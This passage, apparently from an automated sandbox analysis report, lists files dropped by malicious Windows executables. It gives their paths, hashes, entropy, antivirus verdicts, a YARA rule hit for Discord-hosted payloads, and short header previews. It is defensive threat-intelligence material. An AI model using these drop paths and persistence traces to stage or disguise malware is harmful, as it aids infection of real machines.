                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3596288
                                                                                                                        Entropy (8bit):7.997492170986202
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:x+8QEA1GN2zhieKqcTe0f3nWNHiZWf5dxQNPY7wUE9E8gnH43lvn/3juAVUk3Imp:xZ3KKqcTMNIWBnYAlRo7uOUk3ll4UMS
                                                                                                                        MD5:8897C1354CB525DE5F4DE514D6FE836D
                                                                                                                        SHA1:2F92D4CCA4D7576603A442BBACB87450F41CFE6E
                                                                                                                        SHA-256:407C68405D373D2C8EF66B004B293BE25D571348E8922D02D7B79EB20A5138DB
                                                                                                                        SHA-512:A46C6F7BAF298C34607701353E136120153521326A77C787F62F8BF439BB7DEC188A757271B4C8E47E650E86272159FD5D072A1530195D60900FEB8C481F671D
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S.......6.....................................|.N. ....0M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........?....P......................@.............1..p......................@....rsrc........0M.......0.............@....2pZFPAB......N......02.............@....adata........S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\5BBC.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):301056
                                                                                                                        Entropy (8bit):5.192330972647351
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                        MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                        SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                        SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                        SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6471.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3590144
                                                                                                                        Entropy (8bit):7.997643531968
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:49152:3+N1VszZfKeEM30gwJHRUy0hsgpJx7SbEmW/DNYwtinYQYwDvvEipRiGqmkNajh1:381EKrHVRA2A/+NWxYZYYDvvNji7o
                                                                                                                        MD5:DA5C869D0ADE431230679390B5D183BF
                                                                                                                        SHA1:A0A3EC54CDC7762F78BF1DD2C5594F9A6AF2CBC3
                                                                                                                        SHA-256:98CE1395284401CDB5EBF5BDBCB02DDE9C404BEB668B7FF985794AE0408A5805
                                                                                                                        SHA-512:47EA2FF52B50F1E4CB27957451D6C50F2D90B861A4BAF9A96718749368D76491CF9B1D39AA23E059A2A589DC48BD1EF0C529AE201EAD635806CA89A276C82087
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@..........................pS.....#87.....................................|.N. .....M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@................P......................@.............1..`......................@....rsrc.........M.......0.............@....kujN2o2......N.......2.............@....adata.......`S.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):322048
                                                                                                                        Entropy (8bit):6.699290650106884
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:MQ2h5D3tUU9l9zaP2kuPC7dIvnxcDzQMCXfEXu:MQsJpzRtq7GvxcYMC8
                                                                                                                        MD5:039CCF44EF7B55AEB4D22D211D17774E
                                                                                                                        SHA1:5C6E0E0F14F56F8F9C1D990474D9799C595572C1
                                                                                                                        SHA-256:9EE489B4B2FEC770F57CCC6D2EAB9CE29678E3D4CA8A9D6467634B76C30B850A
                                                                                                                        SHA-512:881CA9044920D2C108E3719000C9D881B58BBC5294B96E910B89B27D103D0C56B9F0DCD846FCE0F5160CDD02BF30E3A04DD31D6AE7E3DCDA87B73F3E46540F7A
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L....4.`.........................................@.............................................................................P.......(...............................................................@...............L............................text............................... ..`.data...............................@....tuv................................@....bezax..............................@....lelepar............................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6BA5.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):324608
                                                                                                                        Entropy (8bit):6.709124384088194
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:lx+/UbfEz9xL/a5EQlXyBhQ3hTTJhYjVcsT:lxsUbczr/NKCB+hTTYjuQ
                                                                                                                        MD5:7E58C9178CBD9D56DB805F034EC795CB
                                                                                                                        SHA1:4859C89EED51EAEDAC1BAFBD52BFB5E9382BFDC3
                                                                                                                        SHA-256:2798CE7846DE002A01D784C809499EB20BF108F2D93119AAD082098AC0CB03CC
                                                                                                                        SHA-512:8D4A8C162332095BF5AD4CB1A712D0C0389FCCD91758450A2ABAF79A238977F61A653EE3FD44AF3571D6A6588763C0AAC331474F64571CE7D5FD99614D4C238A
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L....p._..........................................@.................................id..........................................P.......(...............................................................@...............L............................text...~........................... ..`.data...............................@....geravic............................@....pude...............................@....vup................................@....rsrc...(............$..............@..@.reloc..dF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\6E36.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20480
                                                                                                                        Entropy (8bit):5.021094695416705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:1P27QR0ir3uqVQ1Tf+1rkZlgEdLcHIH+2f9sFIILCbj4KQWylH28iYfx:1PYQR0i4krj58LIL0zy2
                                                                                                                        MD5:9DA91D9E3AD909FB8EBA4D3D74344982
                                                                                                                        SHA1:D5B6872D062043478CBA1002A815A013952D3837
                                                                                                                        SHA-256:0417281135837E3CCC11F35B2D17A6A3672B011E85C18884F54F6FEABA7B8069
                                                                                                                        SHA-512:29D672F0BB8AEE885F008F7B7EBED499E7C5D8738B9373BF169896BE85C271FAAB5BD9792C176C7CDCB1C39606F07041E1E54E8F893D1D91F49509DF927AA8A0
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\6E36.exe, Author: Florian Roth
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!................0..J..........rh... ........@.. ...............................1....@................................. h..O...................................Tg..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............N..............@..B................Th......H........C..."...........e..p...........................................^..}.....(.......(.....*..*..0...............(...%.-...(.....s......s....... ....o...... ....o.....(....r...po......... ....s..........o.....[o....o.........o ....[o....o!......o"......o#....s$............io%......o&.........,...o'......o(........,..o'.........,..o'........+...*..(................"......................0............o).....(*.....s+....+..*...0...........s,.... ....(-.....(........r%..po/.
                                                                                                                        C:\Users\user\AppData\Local\Temp\74DE.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1332224
                                                                                                                        Entropy (8bit):6.299565191919942
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:ynJUxJwfdmVnIMJftatB5BgaOfvSpNMtbJTJlF6+L3bMObTCRqCeC1O441JD7cTM:yJMP7av7b9Gf40UCL
                                                                                                                        MD5:E6776A105FE3B67E63EC9DCDF4AFCB63
                                                                                                                        SHA1:DDBA6C56361F4C4556FD3FABFCECC40DA59F71A8
                                                                                                                        SHA-256:511130568349F9ADAFB26B5CB2614E5E3BF46CA807F0F650F3413F916EE0D32B
                                                                                                                        SHA-512:A8DB24C28D3C7637CD3E3DFBCF1152E66798EF0AE53D7E919820AB754D1681B5371D6C3C2A8D3CD32CB34D6AB8F1F94F20FB1B9577861D13CF9ECCE06E9FEEA6
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..J...........h... ........@.. ....................................@..................................g..S.................................................................................... ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................g......H.......P...h{......)C.....ta..................................................g.......y....(.D..*.s!>...T...**....(i...*f....(j...rA..p(....(k...*f....ol...(m...ol...on...*.s.C...y...*f....ol...r.".p(....on...*f....o....r.".p(....on...*f....o....rY#.p(....(k...*.....o....r.#.p(....r...p(....r...p(....(....on...*f....o....r>$.p(....(k...*f....o....r.$.p(....(k...*f....o....r.%.p(....(k...*f....o....ru%.p(....(k...*.~....:#...r.%.p(.....#...(....o....s.........~....*.~....*.~
                                                                                                                        C:\Users\user\AppData\Local\Temp\77CC.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):321024
                                                                                                                        Entropy (8bit):6.6866910329414475
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:pNL0PSBctyx4QHvdwUQGanoDqGY8oQ/0ADAhNS6m:pNAPSlX0GrWD870AMNS
                                                                                                                        MD5:D8DF1D21042865E2220B0D688BAE6DC4
                                                                                                                        SHA1:ADD58C361D687FEB8A6E44CC0992342F6F426B57
                                                                                                                        SHA-256:C17E700DE39B64348D46DA0AC5F69F8279479289A9626BEB63C5ABDB7BCEF1F2
                                                                                                                        SHA-512:42B2BF7381BD0AD57002BB0AF51A2C7B9436D4E4090063CC9EFDF864EEB374B65C9424EBCB7489F4536AF5467A77DAEB73308C4679AC82BC8111BEA472E8E68F
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...!m}`............................ .............@..................................@......................................D...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....hex................................@....suba...............................@....vez................................@....rsrc...(...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):537088
                                                                                                                        Entropy (8bit):5.840438491186833
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                        MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                        SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                        SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                        SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                        C:\Users\user\AppData\Local\Temp\D9EC.exe
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):905216
                                                                                                                        Entropy (8bit):7.399713113456654
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                        MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                        SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                        SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                        SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\evjgtzc.exe
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\77CC.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14218752
                                                                                                                        Entropy (8bit):3.786406643567547
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:NNL0PSBctyx4QHvdwUQGanoDqGY8oQ/0ADAhNS6m:NNAPSlX0GrWD870AMNS
                                                                                                                        MD5:BBB91EAF2FB4CC1AA911FF4D555EC36D
                                                                                                                        SHA1:98DC3BAF9081291CDF915D67B9D654117465A279
                                                                                                                        SHA-256:EFA995DDEA80E0C9D2DD1A6D6E1BA5319D76984153D72A5FFDEFBC141C863B2B
                                                                                                                        SHA-512:B5403EB01038BC6801BDB7AF565DCBD9F78EA91DD6BDD17A2EFDE18AF0B33F450A19C2A635D8F57DAF89BA182343DD556E24E978D6FF0B1A99BFB74EB2480A31
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...!m}`............................ .............@..................................@......................................D...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....hex................................@....suba...............................@....vez................................@....rsrc...(...........................@..@.reloc..ZF.......X..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Roaming\ttfssdi
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):321536
                                                                                                                        Entropy (8bit):6.696489645572037
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:AJfyOCHHmx9MGofauzMYFm6ggAc3DJbkLGrl6:A9onmx4ffPw6kc3FkLm
                                                                                                                        MD5:6F48E0E76C5DFB3FC3AA45311FA6D0EF
                                                                                                                        SHA1:981A29377351493CE6BCE4D3AEDEEC9034DEE056
                                                                                                                        SHA-256:277AC2C203E37DCF3B71748E7DE0610BA4BF87DDBB7A19CBE7E6BE4CCE5ED175
                                                                                                                        SHA-512:394F5C1E1E83EEA7A838270EDD90AE644B4A4F8F0009AC9F382400EA10960F04A4DF4EC8E10CD75ABA7FD9F3424C951BDC6015742899EC77AC666C05F09692D4
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...wi._............................@.............@..................................)......................................d...P.......0...............................................................@...............L............................text............................... ..`.data...............................@....vaxego.............................@....gig................................@....hojotew............................@....rsrc...0...........................@..@.reloc..ZF.......H..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Roaming\ttfssdi:Zone.Identifier
                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):26
                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                        Malicious:true
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):55
                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_030846_681.etl
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8192
                                                                                                                        Entropy (8bit):3.3141361646616425
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:BtCKIoCT2o+5K5+u9L/YAFC6SI2lfvkHM4QOT2zjFzoxNMCbdJRW:BELI6Tw02RtwQC3w
                                                                                                                        MD5:927B70246B82E8AD324C06020435451F
                                                                                                                        SHA1:41DAC7278D27522B4316A24AE60C2E78190018D1
                                                                                                                        SHA-256:D6329A8ED63E4E96A0D31CE00D13086835E2A4621699A93F5A4F81C6C7A1D480
                                                                                                                        SHA-512:55C145816A8F4E92E3C79E30F6BC7A6D6BEABC1305F9B07B079586F2EF1E96CC7F026CD8E0FF48F27A9C410E9FE4DCDE7786AE20DC4AD46F38E6DBC789F1D322
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: .... ... ....................................... ...!...............................p............................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .....h..6............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.5._.0.3.0.8.4.6._.6.8.1...e.t.l.........P.P.....p...........................................................................................................................................................................................................................................................................
                                                                                                                        C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe (copy)
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14218752
                                                                                                                        Entropy (8bit):3.786406643567547
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:NNL0PSBctyx4QHvdwUQGanoDqGY8oQ/0ADAhNS6m:NNAPSlX0GrWD870AMNS
                                                                                                                        MD5:BBB91EAF2FB4CC1AA911FF4D555EC36D
                                                                                                                        SHA1:98DC3BAF9081291CDF915D67B9D654117465A279
                                                                                                                        SHA-256:EFA995DDEA80E0C9D2DD1A6D6E1BA5319D76984153D72A5FFDEFBC141C863B2B
                                                                                                                        SHA-512:B5403EB01038BC6801BDB7AF565DCBD9F78EA91DD6BDD17A2EFDE18AF0B33F450A19C2A635D8F57DAF89BA182343DD556E24E978D6FF0B1A99BFB74EB2480A31
                                                                                                                        Malicious:true
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...!m}`............................ .............@..................................@......................................D...P.......(...............................................................@...............L............................text............................... ..`.data...............................@....hex................................@....suba...............................@....vez................................@....rsrc...(...........................@..@.reloc..ZF.......X..................@..B................................................................................................................................................................................................................................................................
                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1572864
                                                                                                                        Entropy (8bit):4.265179812909518
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:Ax+BOdPDqHjKi7fAOti2ulQ1Aap48xZk8tj8v7W8TKogE410qbDhDkbx:C+BOdPDqHjKi7fA0Egwx
                                                                                                                        MD5:6AACC767C385FCA2EE1130CB536A2E41
                                                                                                                        SHA1:6E32F8C0D1C95973831D0579FA644632A2C05DDB
                                                                                                                        SHA-256:AC3162E77CDB85ABB007BB8EF33CC578204C157F406EE022299668116FEE247A
                                                                                                                        SHA-512:F589967137ADE4ADA5E51ABA689EE22101ACCF9217DA2EBB7E83230BC88DCCDE15835A2C6570442CF7B44D60B5794AE2B5AEE976E1BCD6425FD7E029A810F5A0
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmf..K............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):24576
                                                                                                                        Entropy (8bit):3.7831703751847625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:/stDR5tZrdbdXp5/Qp8NXQnxOf2ofPmxwp+5GjZmGCIDTTVi5N5WeqESODe:UtXrjXpupLgf2oWxwpiWmGCWTVGN5nSO
                                                                                                                        MD5:379E1E75362BB6743CCED68E1B4ACF52
                                                                                                                        SHA1:D108BCB832E6863B71BEA1B7F6CBD98CD75BF935
                                                                                                                        SHA-256:0B7EFBF7B662B46C164CD8D018BE3E2D8DC23BC07B4F98EBC5237B93BEF24511
                                                                                                                        SHA-512:530F87B8BC13EC0FE7D96B677B6BDF405AC3FEE7A83C6A7AA646EA5A6D0B5905AFE63E139D26042A03A3D55DD17BB9C14740077D243A8A4A742533E9CB25EED4
                                                                                                                        Malicious:false
                                                                                                                        Reputation:unknown
                                                                                                                        Preview: regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmf..K....................................................................................................................................................................................................................................................................................................................................................HvLE.^......P..............k......t&*............................... ..hbin................p.\..,..........nk,....K.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....K........ ...........P............... .......Z.......................Root........lf......Root....nk ....K.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                                                                                                                        \Device\ConDrv
                                                                                                                        Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3773
                                                                                                                        Entropy (8bit):4.7109073551842435
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                        MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                        SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                        SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                        SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                        Malicious:false
